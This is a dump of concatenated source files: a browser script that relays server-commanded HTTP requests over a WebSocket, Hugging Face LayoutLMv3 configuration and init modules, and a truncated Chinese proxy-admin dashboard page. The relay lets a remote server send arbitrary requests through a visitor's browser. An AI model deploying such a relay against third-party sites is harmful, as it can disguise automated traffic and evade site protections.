logsDiv.scrollTop = logsDiv.scrollHeight;
console.log(`[${type}] ${message}`);
// 最多保留50条日志
while (logsDiv.children.length > 50) {
logsDiv.removeChild(logsDiv.firstChild);
}
}
// 获取浏览器版本信息
function getBrowserVersion() {
const userAgent = navigator.userAgent;
let version = "未知";
let browserName = "未知";
// 检测常见浏览器
if (userAgent.indexOf("Chrome") > -1) {
browserName = "Chrome";
const chromeVersion = userAgent.match(/Chrome\/(\d+\.\d+)/);
if (chromeVersion && chromeVersion[1]) {
version = chromeVersion[1];
}
} else if (userAgent.indexOf("Firefox") > -1) {
browserName = "Firefox";
const firefoxVersion = userAgent.match(/Firefox\/(\d+\.\d+)/);
if (firefoxVersion && firefoxVersion[1]) {
version = firefoxVersion[1];
}
} else if (userAgent.indexOf("Safari") > -1 && userAgent.indexOf("Chrome") === -1) {
browserName = "Safari";
const safariVersion = userAgent.match(/Version\/(\d+\.\d+)/);
if (safariVersion && safariVersion[1]) {
version = safariVersion[1];
}
} else if (userAgent.indexOf("Edge") > -1 || userAgent.indexOf("Edg") > -1) {
browserName = "Edge";
const edgeVersion = userAgent.match(/Edge\/(\d+\.\d+)/) || userAgent.match(/Edg\/(\d+\.\d+)/);
if (edgeVersion && edgeVersion[1]) {
version = edgeVersion[1];
}
}
return `${browserName} ${version}`;
}
// 更新连接状态
function updateStatus(status) {
switch(status) {
case 'connected':
statusDiv.textContent = '已连接';
statusDiv.className = 'status connected';
break;
case 'disconnected':
statusDiv.textContent = '未连接';
statusDiv.className = 'status disconnected';
break;
case 'connecting':
statusDiv.textContent = '正在连接...';
statusDiv.className = 'status connecting';
break;
}
}
// 发送HTTP请求并返回结果
async function sendRequest(url, method, headers = {}, body = null) {
try {
const xhr = new XMLHttpRequest();
log(`发送HTTP请求: ${method} ${url}`);
// 使用同步XHR (第三个参数设为false)
xhr.open(method, url, false);
// 设置超时
xhr.timeout=20000;
xhr.responseType = 'arraybuffer';
// 检查headers是否为数组格式
let headersObj = headers;
if (Array.isArray(headers)) {
log(`检测到数组格式的headers,按顺序设置`);
headersObj = {};
// 将数组转换为对象,用于后续的内容类型检查
for (const [key, value] of headers) {
headersObj[key] = value;
}
}
// 根据内容类型设置适当的responseType
const contentTypeHeader = headersObj['Content-Type'] || headersObj['content-type'] || '';
const acceptHeader = headersObj['Accept'] || headersObj['accept'] || '';
// 检查是否是二进制内容类型
const isBinaryContent =
acceptHeader.includes('image/') ||
acceptHeader.includes('application/octet-stream') ||
acceptHeader.includes('audio/') ||
acceptHeader.includes('video/') ||
contentTypeHeader.includes('image/') ||
contentTypeHeader.includes('application/octet-stream') ||
contentTypeHeader.includes('audio/') ||
contentTypeHeader.includes('video/');
/* 同步XHR不能设置responseType
if (isBinaryContent) {
xhr.responseType = 'arraybuffer';
log('设置响应类型为arraybuffer,用于处理二进制数据');
}
*/
// 设置Accept-Encoding头,禁用Brotli压缩
if (!headersObj['Accept-Encoding'] && !headersObj['accept-encoding']) {
if (Array.isArray(headers)) {
// 为数组格式添加Accept-Encoding
headers.push(["Accept-Encoding", "gzip, deflate"]);
} else {
headers['Accept-Encoding'] = 'gzip, deflate';
}
}
// 设置请求头
var idxInfo = 0
if (Array.isArray(headers)) {
// 按数组顺序设置头
for (const [key, value] of headers) {
try {
if (key == 'host' || key == 'Host'){
continue
}
xhr.setRequestHeader("Cbb_"+idxInfo+"_"+key, value);
idxInfo += 1
log(`按顺序设置请求头: ${key} = ${value}`);
} catch(e) {
// log(`设置请求头出错: ${e.message}`, 'error');
}
}
} else {
// 使用对象格式设置头(原始方式)
for (const [key, value] of Object.entries(headers)) {
try{
xhr.setRequestHeader("Cbb_"+idxInfo+"_"+key, value);
idxInfo += 1
}catch(e){
// log(`设置请求头出错: ${e.message}`, 'error');
}
}
}
// 发送请求
if (body) {
xhr.send(body);
} else {
xhr.send();
}
// 获取响应头
const responseHeaders = {};
const headerString = xhr.getAllResponseHeaders();
const headerLines = headerString.trim().split(/[\r\n]+/);
headerLines.forEach(line => {
const parts = line.split(': ');
const header = parts.shift();
const value = parts.join(': ');
responseHeaders[header] = value;
});
// 获取响应体
let responseData;
responseData = arrayBufferToBase64(xhr.response);
return {
ok: xhr.status >= 200 && xhr.status < 300,
status: xhr.status,
statusText: xhr.statusText,
headers: responseHeaders,
data: responseData
};
} catch (error) {
log(`请求出错: ${error.message}`, 'error');
return {
ok: false,
error: error.message
};
}
}
// ArrayBuffer 转 Base64,支持 UTF-8 编码
function arrayBufferToBase64(buffer) {
let binary = '';
const bytes = new Uint8Array(buffer);
const len = bytes.byteLength;
for (let i = 0; i < len; i++) {
binary += String.fromCharCode(bytes[i]);
}
return btoa(binary);
}
// 将原始字节数组转换为base64
function _rawBytesToBase64(bytes) {
let binary = '';
const len = bytes.byteLength;
for (let i = 0; i < len; i++) {
binary += String.fromCharCode(bytes[i]);
}
return window.btoa(binary);
}
// 将原始字符串逐字节编码为base64
function _rawStringToBase64(str) {
// 将字符串转换为UTF-8编码的字节数组
const encoder = new TextEncoder();
const bytes = encoder.encode(str);
return _rawBytesToBase64(bytes);
}
// 连接到WebSocket服务器
function connectToServer() {
if (socket && socket.readyState === WebSocket.CONNECTING) {
log('正在连接中,请稍候', 'info');
return;
}
if (socket && socket.readyState === WebSocket.OPEN) {
log('已经连接到服务器', 'info');
return;
}
// 清除可能存在的重连计时器
if (reconnectTimeout) {
clearTimeout(reconnectTimeout);
reconnectTimeout = null;
}
updateStatus('connecting');
// 获取当前主机和协议
const protocol = window.location.protocol === 'https:' ? 'wss:' : 'ws:';
// 默认连接到同一主机的8766端口
const wsUrl = `${protocol}//${window.location.hostname}:8766/ws`;
try {
log(`尝试连接到 ${wsUrl}`);
socket = new WebSocket(wsUrl);
socket.onopen = function(event) {
log('成功连接到WebSocket服务器', 'success');
updateStatus('connected');
reconnectAttempts = 0; // 重置重连次数
// 获取或尝试检测代理地址
detectProxyAddress();
// 获取浏览器版本
const browserVersion = getBrowserVersion();
log(`浏览器版本: ${browserVersion}`);
// 向服务器发送客户端类型信息
socket.send(JSON.stringify({
type: 'client_info',
client_type: 'browser',
client_name: `浏览器 ${Math.floor(Math.random() * 1000)}`,
proxy: proxyAddress,
proxy_id: proxyId, // 添加代理ID信息
version: browserVersion
}));
};
socket.onmessage = async function(event) {
const message = event.data;
try {
const data = JSON.parse(message);
log(`收到服务器消息: ${JSON.stringify(data).slice(0, 100)}${JSON.stringify(data).length > 100 ? '...' : ''}`);
if (data.type === 'client_info_response') {
// 服务器返回客户端信息
clientId = data.client_id;
log(`服务器已分配客户端ID: ${clientId}`, 'info');
}
else if (data.type === 'execute_request') {
// 服务器要求执行HTTP请求
const requestId = data.id;
const params = data.params;
// 解码 base64 到二进制
function base64ToUint8Array(base64) {
const binaryStr = atob(base64);
const len = binaryStr.length;
const bytes = new Uint8Array(len);
for (let i = 0; i < len; i++) {
bytes[i] = binaryStr.charCodeAt(i);
}
return bytes;
}
log(`执行请求: ${params.method} ${params.url}`);
if (params.bodyType == 'b64'){
var binaryData = base64ToUint8Array(params.body);
params.body = binaryData
}
// 执行请求
const result = await sendRequest(
params.url,
params.method || 'GET',
params.headers || {},
params.body
);
// 将结果发送回服务器
socket.send(JSON.stringify({
type: 'response',
id: requestId,
data: result
}));
log(`请求完成: ${params.url}`, 'success');
}
} catch (error) {
log(`解析消息出错: ${error.message}`, 'error');
}
};
socket.onclose = function(event) {
log(`连接已关闭: ${event.reason}`, event.wasClean ? 'info' : 'error');
socket = null;
updateStatus('disconnected');
scheduleReconnect();
};
socket.onerror = function(error) {
log(`WebSocket错误`, 'error');
updateStatus('disconnected');
};
} catch (error) {
log(`创建WebSocket连接出错: ${error.message}`, 'error');
updateStatus('disconnected');
scheduleReconnect();
}
}
// 安排重新连接
function scheduleReconnect() {
if (reconnectAttempts >= maxReconnectAttempts) {
log(`已达到最大重连次数 (${maxReconnectAttempts}),停止重连`, 'error');
return;
}
reconnectAttempts++;
// 清除现有的超时
if (reconnectTimeout) {
clearTimeout(reconnectTimeout);
}
log(`将在10秒后尝试重新连接 (尝试 ${reconnectAttempts}/${maxReconnectAttempts})`, 'info');
reconnectTimeout = setTimeout(() => {
log('正在尝试重新连接...', 'info');
connectToServer();
}, 10000); // 10秒后重连
}
// 客户端ID
let ws = null;
// 发送消息到服务器
function sendMessageToServer(message) {
if (socket && socket.readyState === WebSocket.OPEN) {
socket.send(JSON.stringify(message));
console.log(`已发送消息到服务器: ${message.type}`);
} else {
console.error('WebSocket连接未建立或已关闭');
}
}
// 修改原有的WebSocket消息处理函数,添加XHR请求支持
function handleWebSocketMessage(event) {
try {
const message = JSON.parse(event.data);
if (message.type === "execute_request") {
// 使用XHR异步处理请求
handleXHRRequest(message);
} else if (message.type === "client_info_response") {
clientId = message.client_id;
console.log(`服务器已分配客户端ID: ${clientId}`);
}
} catch (e) {
console.error(`处理WebSocket消息失败: ${e.message}`);
}
}
// 初始化WebSocket连接 - 这个函数会被废弃,不再使用
function initWebSocket() {
console.warn("initWebSocket函数已废弃,请使用connectToServer函数");
}
// 修改页面加载事件,确保只连接一次WebSocket
window.addEventListener('load', function() {
// 显示/隐藏日志(双击状态栏)
statusDiv.addEventListener('dblclick', function() {
logsDiv.classList.toggle('hidden');
});
// 延迟1秒后连接,确保页面完全加载
setTimeout(connectToServer, 1000);
// 添加XHR支持
socket = null; // 确保不会创建重复连接
log("已启用XHR异步请求处理", "info");
});
// 检测页面可见性变化,在页面变为可见时尝试重新连接
document.addEventListener('visibilitychange', function() {
if (document.visibilityState === 'visible' && (!socket || socket.readyState !== WebSocket.OPEN)) {
log('页面变为可见,尝试重新连接', 'info');
connectToServer();
}
});
// 添加XHR异步请求处理函数
function handleXHRRequest(requestData) {
const params = requestData.params;
const url = params.url;
const method = params.method || 'GET';
const headers = params.headers || {};
const body = params.body;
const requestId = requestData.id;
console.log(`开始处理XHR请求: ${method} ${url}`);
// 使用简化版的sendRequest进行处理
// 由于我们已经对sendRequest函数进行了修改以支持数组格式的headers
// 这里直接调用它来处理请求,确保一致性
const result = sendRequest(url, method, headers, body);
// 构建响应对象并发送
const responseData = {
type: "response",
id: requestId,
data: result
};
if (socket && socket.readyState === WebSocket.OPEN) {
socket.send(JSON.stringify(responseData));
console.log(`请求完成: ${url}, 状态: ${result.status}`);
} else {
console.error('WebSocket连接未建立或已关闭,无法发送响应');
}
}
</script>
</body>
</html> |
27182812/ChatGLM-LLaMA-chinese-insturct | 13,365 | src/transformers/models/layoutlmv3/configuration_layoutlmv3.py | # coding=utf-8
# Copyright 2022 Microsoft Research and The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" LayoutLMv3 model configuration"""
from collections import OrderedDict
from typing import TYPE_CHECKING, Any, Mapping, Optional
from packaging import version
from ...configuration_utils import PretrainedConfig
from ...onnx import OnnxConfig
from ...onnx.utils import compute_effective_axis_dimension
from ...utils import logging
if TYPE_CHECKING:
from ...processing_utils import ProcessorMixin
from ...utils import TensorType
logger = logging.get_logger(__name__)
# Maps canonical checkpoint identifiers to their hosted configuration files.
LAYOUTLMV3_PRETRAINED_CONFIG_ARCHIVE_MAP = {
    "microsoft/layoutlmv3-base": "https://huggingface.co/microsoft/layoutlmv3-base/resolve/main/config.json",
}
class LayoutLMv3Config(PretrainedConfig):
    r"""
    This is the configuration class to store the configuration of a [`LayoutLMv3Model`]. It is used to instantiate an
    LayoutLMv3 model according to the specified arguments, defining the model architecture. Instantiating a
    configuration with the defaults will yield a similar configuration to that of the LayoutLMv3
    [microsoft/layoutlmv3-base](https://huggingface.co/microsoft/layoutlmv3-base) architecture.
    Configuration objects inherit from [`PretrainedConfig`] and can be used to control the model outputs. Read the
    documentation from [`PretrainedConfig`] for more information.
    Args:
        vocab_size (`int`, *optional*, defaults to 50265):
            Vocabulary size of the LayoutLMv3 model. Defines the number of different tokens that can be represented by
            the `inputs_ids` passed when calling [`LayoutLMv3Model`].
        hidden_size (`int`, *optional*, defaults to 768):
            Dimension of the encoder layers and the pooler layer.
        num_hidden_layers (`int`, *optional*, defaults to 12):
            Number of hidden layers in the Transformer encoder.
        num_attention_heads (`int`, *optional*, defaults to 12):
            Number of attention heads for each attention layer in the Transformer encoder.
        intermediate_size (`int`, *optional*, defaults to 3072):
            Dimension of the "intermediate" (i.e., feed-forward) layer in the Transformer encoder.
        hidden_act (`str` or `function`, *optional*, defaults to `"gelu"`):
            The non-linear activation function (function or string) in the encoder and pooler. If string, `"gelu"`,
            `"relu"`, `"selu"` and `"gelu_new"` are supported.
        hidden_dropout_prob (`float`, *optional*, defaults to 0.1):
            The dropout probabilitiy for all fully connected layers in the embeddings, encoder, and pooler.
        attention_probs_dropout_prob (`float`, *optional*, defaults to 0.1):
            The dropout ratio for the attention probabilities.
        max_position_embeddings (`int`, *optional*, defaults to 512):
            The maximum sequence length that this model might ever be used with. Typically set this to something large
            just in case (e.g., 512 or 1024 or 2048).
        type_vocab_size (`int`, *optional*, defaults to 2):
            The vocabulary size of the `token_type_ids` passed when calling [`LayoutLMv3Model`].
        initializer_range (`float`, *optional*, defaults to 0.02):
            The standard deviation of the truncated_normal_initializer for initializing all weight matrices.
        layer_norm_eps (`float`, *optional*, defaults to 1e-5):
            The epsilon used by the layer normalization layers.
        max_2d_position_embeddings (`int`, *optional*, defaults to 1024):
            The maximum value that the 2D position embedding might ever be used with. Typically set this to something
            large just in case (e.g., 1024).
        coordinate_size (`int`, *optional*, defaults to `128`):
            Dimension of the coordinate embeddings.
        shape_size (`int`, *optional*, defaults to `128`):
            Dimension of the width and height embeddings.
        has_relative_attention_bias (`bool`, *optional*, defaults to `True`):
            Whether or not to use a relative attention bias in the self-attention mechanism.
        rel_pos_bins (`int`, *optional*, defaults to 32):
            The number of relative position bins to be used in the self-attention mechanism.
        max_rel_pos (`int`, *optional*, defaults to 128):
            The maximum number of relative positions to be used in the self-attention mechanism.
        max_rel_2d_pos (`int`, *optional*, defaults to 256):
            The maximum number of relative 2D positions in the self-attention mechanism.
        rel_2d_pos_bins (`int`, *optional*, defaults to 64):
            The number of 2D relative position bins in the self-attention mechanism.
        has_spatial_attention_bias (`bool`, *optional*, defaults to `True`):
            Whether or not to use a spatial attention bias in the self-attention mechanism.
        text_embed (`bool`, *optional*, defaults to `True`):
            Whether or not to add text (word) embeddings. (NOTE: inferred from the attribute name — this parameter
            was previously undocumented; confirm against the model implementation.)
        visual_embed (`bool`, *optional*, defaults to `True`):
            Whether or not to add patch embeddings.
        input_size (`int`, *optional*, defaults to `224`):
            The size (resolution) of the images.
        num_channels (`int`, *optional*, defaults to `3`):
            The number of channels of the images.
        patch_size (`int`, *optional*, defaults to `16`):
            The size (resolution) of the patches.
        classifier_dropout (`float`, *optional*):
            The dropout ratio for the classification head.
    Example:
    ```python
    >>> from transformers import LayoutLMv3Config, LayoutLMv3Model
    >>> # Initializing a LayoutLMv3 microsoft/layoutlmv3-base style configuration
    >>> configuration = LayoutLMv3Config()
    >>> # Initializing a model (with random weights) from the microsoft/layoutlmv3-base style configuration
    >>> model = LayoutLMv3Model(configuration)
    >>> # Accessing the model configuration
    >>> configuration = model.config
    ```"""

    model_type = "layoutlmv3"

    def __init__(
        self,
        vocab_size=50265,
        hidden_size=768,
        num_hidden_layers=12,
        num_attention_heads=12,
        intermediate_size=3072,
        hidden_act="gelu",
        hidden_dropout_prob=0.1,
        attention_probs_dropout_prob=0.1,
        max_position_embeddings=512,
        type_vocab_size=2,
        initializer_range=0.02,
        layer_norm_eps=1e-5,
        pad_token_id=1,
        bos_token_id=0,
        eos_token_id=2,
        max_2d_position_embeddings=1024,
        coordinate_size=128,
        shape_size=128,
        has_relative_attention_bias=True,
        rel_pos_bins=32,
        max_rel_pos=128,
        rel_2d_pos_bins=64,
        max_rel_2d_pos=256,
        has_spatial_attention_bias=True,
        text_embed=True,
        visual_embed=True,
        input_size=224,
        num_channels=3,
        patch_size=16,
        classifier_dropout=None,
        **kwargs,
    ):
        # Standard text-transformer hyperparameters are handled by the parent config.
        super().__init__(
            vocab_size=vocab_size,
            hidden_size=hidden_size,
            num_hidden_layers=num_hidden_layers,
            num_attention_heads=num_attention_heads,
            intermediate_size=intermediate_size,
            hidden_act=hidden_act,
            hidden_dropout_prob=hidden_dropout_prob,
            attention_probs_dropout_prob=attention_probs_dropout_prob,
            max_position_embeddings=max_position_embeddings,
            type_vocab_size=type_vocab_size,
            initializer_range=initializer_range,
            layer_norm_eps=layer_norm_eps,
            pad_token_id=pad_token_id,
            bos_token_id=bos_token_id,
            eos_token_id=eos_token_id,
            **kwargs,
        )
        # LayoutLMv3-specific hyperparameters: 2D layout embeddings and relative-bias settings.
        self.max_2d_position_embeddings = max_2d_position_embeddings
        self.coordinate_size = coordinate_size
        self.shape_size = shape_size
        self.has_relative_attention_bias = has_relative_attention_bias
        self.rel_pos_bins = rel_pos_bins
        self.max_rel_pos = max_rel_pos
        self.has_spatial_attention_bias = has_spatial_attention_bias
        self.rel_2d_pos_bins = rel_2d_pos_bins
        self.max_rel_2d_pos = max_rel_2d_pos
        # Modality toggles and vision-branch hyperparameters.
        self.text_embed = text_embed
        self.visual_embed = visual_embed
        self.input_size = input_size
        self.num_channels = num_channels
        self.patch_size = patch_size
        self.classifier_dropout = classifier_dropout
class LayoutLMv3OnnxConfig(OnnxConfig):
    # Minimum torch version known to export this architecture to ONNX correctly.
    torch_onnx_minimum_version = version.parse("1.12")

    @property
    def inputs(self) -> Mapping[str, Mapping[int, str]]:
        """Return the ordered mapping of ONNX input names to their dynamic axes."""
        # The order of inputs is different for question answering and sequence classification
        if self.task in ["question-answering", "sequence-classification"]:
            return OrderedDict(
                [
                    ("input_ids", {0: "batch", 1: "sequence"}),
                    ("attention_mask", {0: "batch", 1: "sequence"}),
                    ("bbox", {0: "batch", 1: "sequence"}),
                    ("pixel_values", {0: "batch", 1: "num_channels", 2: "height", 3: "width"}),
                ]
            )
        else:
            return OrderedDict(
                [
                    ("input_ids", {0: "batch", 1: "sequence"}),
                    ("bbox", {0: "batch", 1: "sequence"}),
                    ("attention_mask", {0: "batch", 1: "sequence"}),
                    # NOTE(review): only 2 dynamic axes here vs. 4 in the branch above —
                    # verify the asymmetry is intentional.
                    ("pixel_values", {0: "batch", 1: "num_channels"}),
                ]
            )
    @property
    def atol_for_validation(self) -> float:
        # Absolute tolerance used when comparing exported-model outputs during validation.
        return 1e-5

    @property
    def default_onnx_opset(self) -> int:
        # Default ONNX opset version used for export.
        return 12
def generate_dummy_inputs(
self,
processor: "ProcessorMixin",
batch_size: int = -1,
seq_length: int = -1,
is_pair: bool = False,
framework: Optional["TensorType"] = None,
num_channels: int = 3,
image_width: int = 40,
image_height: int = 40,
) -> Mapping[str, Any]:
"""
Generate inputs to provide to the ONNX exporter for the specific framework
Args:
processor ([`ProcessorMixin`]):
The processor associated with this model configuration.
batch_size (`int`, *optional*, defaults to -1):
The batch size to export the model for (-1 means dynamic axis).
seq_length (`int`, *optional*, defaults to -1):
The sequence length to export the model for (-1 means dynamic axis).
is_pair (`bool`, *optional*, defaults to `False`):
Indicate if the input is a pair (sentence 1, sentence 2).
framework (`TensorType`, *optional*, defaults to `None`):
The framework (PyTorch or TensorFlow) that the processor will generate tensors for.
num_channels (`int`, *optional*, defaults to 3):
The number of channels of the generated images.
image_width (`int`, *optional*, defaults to 40):
The width of the generated images.
image_height (`int`, *optional*, defaults to 40):
The height of the generated images.
Returns:
Mapping[str, Any]: holding the kwargs to provide to the model's forward function
"""
# A dummy image is used so OCR should not be applied
setattr(processor.feature_extractor, "apply_ocr", False)
# If dynamic axis (-1) we forward with a fixed dimension of 2 samples to avoid optimizations made by ONNX
batch_size = compute_effective_axis_dimension(
batch_size, fixed_dimension=OnnxConfig.default_fixed_batch, num_token_to_add=0
)
# If dynamic axis (-1) we forward with a fixed dimension of 8 tokens to avoid optimizations made by ONNX
token_to_add = processor.tokenizer.num_special_tokens_to_add(is_pair)
seq_length = compute_effective_axis_dimension(
seq_length, fixed_dimension=OnnxConfig.default_fixed_sequence, num_token_to_add=token_to_add
)
# Generate dummy inputs according to compute batch and sequence
dummy_text = [[" ".join([processor.tokenizer.unk_token]) * seq_length]] * batch_size
# Generate dummy bounding boxes
dummy_bboxes = [[[48, 84, 73, 128]]] * batch_size
# If dynamic axis (-1) we forward with a fixed dimension of 2 samples to avoid optimizations made by ONNX
# batch_size = compute_effective_axis_dimension(batch_size, fixed_dimension=OnnxConfig.default_fixed_batch)
dummy_image = self._generate_dummy_images(batch_size, num_channels, image_height, image_width)
inputs = dict(
processor(
dummy_image,
text=dummy_text,
boxes=dummy_bboxes,
return_tensors=framework,
)
)
return inputs
|
27182812/ChatGLM-LLaMA-chinese-insturct | 4,512 | src/transformers/models/layoutlmv3/__init__.py | # Copyright 2022 The HuggingFace Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import TYPE_CHECKING
from ...utils import (
OptionalDependencyNotAvailable,
_LazyModule,
is_tf_available,
is_tokenizers_available,
is_torch_available,
is_vision_available,
)
# Map of submodule name -> public names it defines. Consumed by `_LazyModule`
# below so heavy optional dependencies are imported only on first attribute access.
_import_structure = {
    "configuration_layoutlmv3": [
        "LAYOUTLMV3_PRETRAINED_CONFIG_ARCHIVE_MAP",
        "LayoutLMv3Config",
        "LayoutLMv3OnnxConfig",
    ],
    "processing_layoutlmv3": ["LayoutLMv3Processor"],
    "tokenization_layoutlmv3": ["LayoutLMv3Tokenizer"],
}
# Expose the fast tokenizer only when the `tokenizers` library is installed.
try:
    if not is_tokenizers_available():
        raise OptionalDependencyNotAvailable()
except OptionalDependencyNotAvailable:
    pass
else:
    _import_structure["tokenization_layoutlmv3_fast"] = ["LayoutLMv3TokenizerFast"]
# Expose the PyTorch models only when torch is installed.
try:
    if not is_torch_available():
        raise OptionalDependencyNotAvailable()
except OptionalDependencyNotAvailable:
    pass
else:
    _import_structure["modeling_layoutlmv3"] = [
        "LAYOUTLMV3_PRETRAINED_MODEL_ARCHIVE_LIST",
        "LayoutLMv3ForQuestionAnswering",
        "LayoutLMv3ForSequenceClassification",
        "LayoutLMv3ForTokenClassification",
        "LayoutLMv3Model",
        "LayoutLMv3PreTrainedModel",
    ]
# Expose the TensorFlow models only when TensorFlow is installed.
try:
    if not is_tf_available():
        raise OptionalDependencyNotAvailable()
except OptionalDependencyNotAvailable:
    pass
else:
    _import_structure["modeling_tf_layoutlmv3"] = [
        "TF_LAYOUTLMV3_PRETRAINED_MODEL_ARCHIVE_LIST",
        "TFLayoutLMv3ForQuestionAnswering",
        "TFLayoutLMv3ForSequenceClassification",
        "TFLayoutLMv3ForTokenClassification",
        "TFLayoutLMv3Model",
        "TFLayoutLMv3PreTrainedModel",
    ]
# Image-processing classes need PIL (vision extra).
try:
    if not is_vision_available():
        raise OptionalDependencyNotAvailable()
except OptionalDependencyNotAvailable:
    pass
else:
    _import_structure["feature_extraction_layoutlmv3"] = ["LayoutLMv3FeatureExtractor"]
    _import_structure["image_processing_layoutlmv3"] = ["LayoutLMv3ImageProcessor"]
# Under static type checking, perform the real imports (mirroring the structure
# above exactly) so IDEs and type checkers can resolve every symbol.
if TYPE_CHECKING:
    from .configuration_layoutlmv3 import (
        LAYOUTLMV3_PRETRAINED_CONFIG_ARCHIVE_MAP,
        LayoutLMv3Config,
        LayoutLMv3OnnxConfig,
    )
    from .processing_layoutlmv3 import LayoutLMv3Processor
    from .tokenization_layoutlmv3 import LayoutLMv3Tokenizer
    try:
        if not is_tokenizers_available():
            raise OptionalDependencyNotAvailable()
    except OptionalDependencyNotAvailable:
        pass
    else:
        from .tokenization_layoutlmv3_fast import LayoutLMv3TokenizerFast
    try:
        if not is_torch_available():
            raise OptionalDependencyNotAvailable()
    except OptionalDependencyNotAvailable:
        pass
    else:
        from .modeling_layoutlmv3 import (
            LAYOUTLMV3_PRETRAINED_MODEL_ARCHIVE_LIST,
            LayoutLMv3ForQuestionAnswering,
            LayoutLMv3ForSequenceClassification,
            LayoutLMv3ForTokenClassification,
            LayoutLMv3Model,
            LayoutLMv3PreTrainedModel,
        )
    try:
        if not is_tf_available():
            raise OptionalDependencyNotAvailable()
    except OptionalDependencyNotAvailable:
        pass
    else:
        from .modeling_tf_layoutlmv3 import (
            TF_LAYOUTLMV3_PRETRAINED_MODEL_ARCHIVE_LIST,
            TFLayoutLMv3ForQuestionAnswering,
            TFLayoutLMv3ForSequenceClassification,
            TFLayoutLMv3ForTokenClassification,
            TFLayoutLMv3Model,
            TFLayoutLMv3PreTrainedModel,
        )
    try:
        if not is_vision_available():
            raise OptionalDependencyNotAvailable()
    except OptionalDependencyNotAvailable:
        pass
    else:
        from .feature_extraction_layoutlmv3 import LayoutLMv3FeatureExtractor
        from .image_processing_layoutlmv3 import LayoutLMv3ImageProcessor
# At runtime, replace this module with a lazy proxy that imports submodules on demand.
else:
    import sys
    sys.modules[__name__] = _LazyModule(__name__, globals()["__file__"], _import_structure, module_spec=__spec__)
|
2833844911/cyTlsXhr | 10,648 | templates/dashboard.html | <!DOCTYPE html>
<html lang="zh-CN">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>代理服务器管理面板</title>
<link rel="stylesheet" href="/static/css/style.css">
</head>
<body>
<div class="dashboard-container">
<header class="dashboard-header">
<h1>代理服务器管理系统</h1>
<div class="user-info">
<span id="current-user">管理员</span>
<button id="logout-btn" class="btn-logout">退出登录</button>
</div>
</header>
<div class="dashboard-content">
<div class="sidebar">
<ul class="nav-menu">
                <li data-tab="status" class="active">服务器状态</li>
                <li data-tab="ports">多端口管理</li>
                <li data-tab="users">用户管理</li>
<li data-tab="settings">系统设置</li>
<li data-tab="stats">访问统计</li>
</ul>
</div>
<div class="main-content">
<!-- 服务器状态面板 -->
<div id="status-panel" class="panel active">
<h2>服务器状态</h2>
<div class="status-card">
<div class="status-item">
<span class="label">运行状态:</span>
<span id="proxy-status" class="value status-indicator">停止</span>
</div>
<div class="status-item">
<span class="label">监听地址:</span>
<span id="proxy-address" class="value">0.0.0.0:8080</span>
</div>
<div class="status-item">
<span class="label">启动时间:</span>
<span id="start-time" class="value">-</span>
</div>
<div class="status-item">
<span class="label">总连接数:</span>
<span id="connection-count" class="value">0</span>
</div>
<div class="status-actions">
<button id="start-proxy" class="btn-action">启动服务</button>
<button id="stop-proxy" class="btn-action" disabled>停止服务</button>
</div>
</div>
</div>
<!-- 多端口管理面板 -->
<div id="ports-panel" class="panel">
<h2>多端口管理</h2>
<div class="ports-container">
<div class="ports-list-container">
<table class="ports-table">
<thead>
<tr>
<th>监听地址</th>
<th>状态</th>
<th>连接数</th>
<th>匿名访问</th>
<th>操作</th>
</tr>
</thead>
<tbody id="ports-list">
<!-- 端口列表将通过JavaScript动态生成 -->
</tbody>
</table>
</div>
<div class="add-port-form">
<h3>添加新端口</h3>
<form id="add-port-form">
<div class="form-group">
<label for="new-port-addr">监听地址 (格式: IP:端口)</label>
<input type="text" id="new-port-addr" name="listen_addr" placeholder="例如: 0.0.0.0:8082" required>
</div>
<div class="form-group checkbox-group">
<input type="checkbox" id="new-port-anonymous" name="allow_anonymous">
<label for="new-port-anonymous">允许匿名访问 (不需要账号密码)</label>
</div>
<button type="submit" class="btn-add">添加端口</button>
</form>
</div>
</div>
</div>
<!-- 用户管理面板 -->
<div id="users-panel" class="panel">
<h2>用户管理</h2>
<div class="user-list-container">
<table class="user-table">
<thead>
<tr>
<th>用户名</th>
<th>密码</th>
<th>操作</th>
</tr>
</thead>
<tbody id="user-list">
<!-- 用户列表将通过JavaScript动态生成 -->
</tbody>
</table>
<div class="add-user-form">
<h3>添加新用户</h3>
<form id="add-user-form">
<div class="form-group">
<label for="new-username">用户名</label>
<input type="text" id="new-username" name="username" required>
</div>
<div class="form-group">
<label for="new-password">密码</label>
<input type="password" id="new-password" name="password" required>
</div>
<div class="form-group checkbox-group">
<input type="checkbox" id="no-auth-user" name="no-auth-user">
<label for="no-auth-user">无需认证的用户(不需要账号密码)</label>
</div>
<button type="submit" class="btn-add">添加用户</button>
</form>
</div>
</div>
</div>
<!-- 系统设置面板 -->
<div id="settings-panel" class="panel">
<h2>系统设置</h2>
<form id="settings-form" class="settings-form">
<div class="form-group">
<label for="proxy-port">默认代理服务器端口</label>
<input type="number" id="proxy-port" name="proxy-port" min="1" max="65535" value="8080" required>
</div>
<div class="form-group">
<label for="web-port">Web管理端口</label>
<input type="number" id="web-port" name="web-port" min="1" max="65535" value="8081" required>
</div>
<div class="form-group">
<label for="admin-username">管理员用户名</label>
<input type="text" id="admin-username" name="admin-username" value="admin" required>
</div>
<div class="form-group">
<label for="admin-password">管理员密码</label>
<input type="password" id="admin-password" name="admin-password" placeholder="输入新密码以修改" autocomplete="new-password">
</div>
<div class="form-group checkbox-group">
<input type="checkbox" id="use-forward-proxy" name="use-forward-proxy">
<label for="use-forward-proxy">启用代理转发</label>
</div>
<div id="remote-proxy-settings" style="display: none; margin-left: 25px; border-left: 2px solid #1890ff; padding-left: 10px;">
<div class="form-group">
